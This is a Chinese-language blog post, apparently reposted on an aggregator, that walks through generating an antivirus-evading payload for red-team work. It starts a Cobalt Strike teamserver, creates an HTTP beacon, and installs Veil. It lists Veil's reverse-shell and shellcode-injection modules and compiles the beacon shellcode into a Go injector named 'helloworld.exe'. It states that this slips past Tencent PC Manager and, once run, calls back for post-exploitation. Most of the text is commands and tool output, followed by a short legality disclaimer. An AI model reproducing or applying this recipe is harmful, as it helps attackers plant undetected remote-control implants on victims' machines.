一、背景

在做紅隊滲透時，經常會遇到目標機安裝了各種殺毒軟件，諸如360、騰訊管家之類的。導致生成的payload總是無法利用且被殺軟強制刪除的事情時常發生。這個東西真的很煩人，煩死了！只能停下來去研究一下殺軟的原理以及如何繞過。在此記錄下來做個備忘錄。

二、需要用到的工具

cobalt strike:這個是在做紅隊滲透時用到的一款軟件，具有團隊協作和生成payload的工具。主要有兩個部分組成，一個是服務器端，一個是客戶端，服務器端只支持Linux，客戶端MacOS、Windows、Linux都支持。軟件運行前提是要安裝java。

相關鏈接：

Adversary Simulation and Red Team Operations Software?www.cobaltstrike.com

Veil：這個是一款生成payload并繞過殺軟的一款工具。

相關鏈接：

https://github.com/Veil-Framework/Veil?github.com

三、免殺步驟

3.1 設置CS服務器端和客戶端

在這里提醒一下，如果你的CS展開目錄之后文件沒有執行權限，是無法運行的，所以需要給CS目錄下的文件添加執行權限。

chmod +x 文件名

運行CS服務端

(base) root@kali:~/python/cs4.0# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255inet6 fe80::20c:33ff:dfbf:dfa3 prefixlen 64 scopeid 0x20<link>ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)RX packets 130003 bytes 193285222 (184.3 MiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 81397 bytes 4399635 (4.1 MiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0device interrupt 19 base 0x2000lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 24 bytes 1356 (1.3 KiB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 24 bytes 1356 (1.3 KiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 (base) root@kali:~/python/cs4.0# ./teamserver 192.168.91.156 123456 [*] Will use existing X509 certificate and keystore (for SSL) [+] Team server is up on 50050 [*] SHA256 hash of SSL cert is: [+] Listener: test started!

運行CS客戶端

點擊【連接】即可打開CS客戶端。

3.2利用CS生成payload

監聽器類型設置為http類型

選擇【Choose】，生成payload保存在文件夾備用。

3.3安裝veil

建議使用Kali快速安裝命令

apt -y install veil /usr/share/veil/config/setup.sh --force --silent

安裝過程比較慢，且需要掛代理。

安裝時會自動下載安裝依賴軟件，安裝成功后如圖所示：

在veil里輸入

use 1

可以看到Veil里總共有41種payload，我們輸入list查看所有payload

===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[*] Available Payloads:1) autoit/shellcode_inject/flat.py2) auxiliary/coldwar_wrapper.py3) auxiliary/macro_converter.py4) auxiliary/pyinstaller_wrapper.py5) c/meterpreter/rev_http.py6) c/meterpreter/rev_http_service.py7) c/meterpreter/rev_tcp.py8) c/meterpreter/rev_tcp_service.py9) cs/meterpreter/rev_http.py10) cs/meterpreter/rev_https.py11) cs/meterpreter/rev_tcp.py12) cs/shellcode_inject/base64.py13) cs/shellcode_inject/virtual.py14) go/meterpreter/rev_http.py15) go/meterpreter/rev_https.py16) go/meterpreter/rev_tcp.py17) go/shellcode_inject/virtual.py18) lua/shellcode_inject/flat.py19) perl/shellcode_inject/flat.py20) powershell/meterpreter/rev_http.py21) powershell/meterpreter/rev_https.py22) powershell/meterpreter/rev_tcp.py23) powershell/shellcode_inject/psexec_virtual.py24) powershell/shellcode_inject/virtual.py25) python/meterpreter/bind_tcp.py26) python/meterpreter/rev_http.py27) python/meterpreter/rev_https.py28) python/meterpreter/rev_tcp.py29) python/shellcode_inject/aes_encrypt.py30) python/shellcode_inject/arc_encrypt.py31) python/shellcode_inject/base64_substitution.py32) python/shellcode_inject/des_encrypt.py33) python/shellcode_inject/flat.py34) python/shellcode_inject/letter_substitution.py35) python/shellcode_inject/pidinject.py36) python/shellcode_inject/stallion.py37) ruby/meterpreter/rev_http.py38) ruby/meterpreter/rev_https.py39) ruby/meterpreter/rev_tcp.py40) ruby/shellcode_inject/base64.py41) ruby/shellcode_inject/flat.py

我們選擇Go語言生成shellcode

Veil/Evasion>: use 17 ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================Payload Information:Name: Golang Flat Shellcode InjectorLanguage: goRating: NormalDescription: Golang VirtualAlloc method for inline shellcodeinjection Payload: go/shellcode_inject/virtual selectedRequired Options: Name Value Description ---- ----- ----------- BADMACS FALSE Check for VM based MAC addresses CLICKTRACK X Require X number of clicks before execution COMPILE_TO_EXE Y Compile to an executable CURSORCHECK FALSE Check for mouse movements DISKSIZE X Check for a minimum number of gigs for hard disk HOSTNAME X Optional: Required system hostname INJECT_METHOD Virtual Virtual or Heap MINPROCS X Minimum number of running processes PROCCHECK FALSE Check for active VM processes PROCESSORS X Optional: Minimum number of processors RAMCHECK FALSE Check for at least 3 gigs of RAM SLEEP X Optional: Sleep "Y" seconds, check if accelerated USERNAME X Optional: The required user account USERPROMPT FALSE Prompt user prior to injection UTCCHECK FALSE Check if system uses UTC timeAvailable Commands:back Go back to Veil-Evasionexit Completely exit Veilgenerate Generate the payloadoptions Show the shellcode's optionsset Set shellcode option

輸入【generate】

[go/shellcode_inject/virtual>>]: generate[?] Generate or supply custom shellcode?1 - Ordnance (default)2 - MSFVenom3 - Custom shellcode string4 - File with shellcode (x41x42..)5 - Binary file with shellcode[>] Please enter the number of your choice: 3[>] Please enter custom shellcode (one line, no quotes, x00.. format):

在上面輸入CS生成的Payload，設置文件名，就生成了一個免殺payload。

[*] Using pre-generated shellcode... ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[>] Please enter the base name for output files (default is payload): helloworld.exe runtime/internal/sys runtime/internal/atomic runtime errors internal/race sync/atomic math internal/syscall/windows/sysdll unicode/utf16 unicode/utf8 sync io syscall strconv internal/syscall/windows internal/syscall/windows/registry time reflect os fmt command-line-arguments ===============================================================================Veil-Evasion ===============================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ===============================================================================[*] Language: go[*] Payload Module: go/shellcode_inject/virtual[*] Executable written to: /var/lib/veil/output/compiled/helloworld.exe.exe[*] Source code written to: /var/lib/veil/output/source/helloworld.exe.go

生成的payload存放路徑會在shell里說明，找到那個文件，放在安裝了騰訊電腦管家的虛擬機里運行一下看看會不會報毒。

接下來用電腦管家查殺一下剛才生成的payload。

即可成功繞過騰訊電腦管家。接下來就是雙擊運行，等待CS上線對話做后滲透階段一把梭了。
以上內容僅作安全研究使用，請勿做非法事情。堅守自己的底線，做守法公民。

總結

以上是生活随笔為你收集整理的python自启动 绕过360_记录一次绕过杀软的过程的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。